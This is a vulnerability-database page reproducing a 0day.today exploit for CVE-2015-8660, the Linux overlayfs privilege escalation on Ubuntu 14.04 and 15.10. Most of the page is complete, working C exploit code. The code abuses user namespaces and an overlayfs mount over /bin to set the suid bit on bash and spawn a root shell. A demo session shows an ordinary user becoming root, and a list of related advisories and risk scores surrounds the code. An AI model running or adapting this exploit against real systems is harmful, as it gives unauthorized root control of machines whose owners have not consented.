Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1)

🗓️ 05 Jan 2016 00:00:00Reported by rebelType

zdt🔗 0day.today👁 77 Views

Linux Kernel 4.3.3 Privilege Escalation via Overlayf

Reporter	Title	Published	Views	Family All 122
0day.today	Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)	12 Jan 201600:00	–	zdt
0day.today	Overlayfs Privilege Escalation Exploit	2 Nov 201600:00	–	zdt
0day.today	Linux Kernel (Ubuntu / Fedora / Redhat) - 'Overlayfs' Privilege Escalation Exploit	3 Nov 201600:00	–	zdt
IBM Security Bulletins	Security Bulletin: Vulnerabilities in the Linux kernel affect PowerKVM	18 Jun 201801:33	–	ibm
Tenable Nessus	CentOS 7 : kernel (CESA-2016:1539)	4 Aug 201600:00	–	nessus
Tenable Nessus	EulerOS 2.0 SP1 : kernel (EulerOS-SA-2016-1020)	1 May 201700:00	–	nessus
Tenable Nessus	EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1489)	13 May 201900:00	–	nessus
Tenable Nessus	EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1505)	13 May 201900:00	–	nessus
Tenable Nessus	MiracleLinux 7 : kernel-3.10.0-327.28.2.el7 (AXSA:2016-647:05)	19 Jan 202600:00	–	nessus
Tenable Nessus	Oracle Linux 7 : kernel (ELSA-2016-1539)	3 Aug 201600:00	–	nessus

/*
just another overlayfs exploit, works on kernels before 2015-12-26
 
# Exploit Title: overlayfs local root
# Date: 2016-01-05
# Exploit Author: rebel
# Version: Ubuntu 14.04 LTS, 15.10 and more
# Tested on: Ubuntu 14.04 LTS, 15.10
# CVE : CVE-2015-8660
 
[email protected]:~$ id
uid=1001(blah) gid=1001(blah) groups=1001(blah)
[email protected]:~$ uname -a && cat /etc/issue
Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
Ubuntu 14.04.3 LTS \n \l
[email protected]:~$ ./overlayfail
[email protected]:~# id
uid=0(root) gid=1001(blah) groups=0(root),1001(blah)
 
12/2015
by rebel
 
6354b4e23db225b565d79f226f2e49ec0fe1e19b
*/
 
#include <stdio.h>
#include <sched.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
#include <sys/wait.h>
 
static char child_stack[1024*1024];
 
static int
child_exec(void *stuff)
{
    system("rm -rf /tmp/haxhax");
    mkdir("/tmp/haxhax", 0777);
    mkdir("/tmp/haxhax/w", 0777);
    mkdir("/tmp/haxhax/u",0777);
    mkdir("/tmp/haxhax/o",0777);
 
    if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {
    fprintf(stderr,"mount failed..\n");
    }
 
    chmod("/tmp/haxhax/w/work",0777);
    chdir("/tmp/haxhax/o");
    chmod("bash",04755);
    chdir("/");
    umount("/tmp/haxhax/o");
    return 0;
}
 
int
main(int argc, char **argv)
{
    int status;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
    struct stat s;
 
    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
 
        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
 
            waitpid(pid, &status, 0);
 
        }
 
        waitpid(init, &status, 0);
        return 0;
    }
 
    usleep(300000);
 
    wait(NULL);
 
    stat("/tmp/haxhax/u/bash",&s);
 
    if(s.st_mode == 0x89ed)
        execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);
 
    fprintf(stderr,"couldn't create suid :(\n");
    return -1;
}

#  0day.today [2018-04-12]  #

05 Jan 2016 00:00Current

0.7Low risk

Vulners AI Score0.7

EPSS0.58352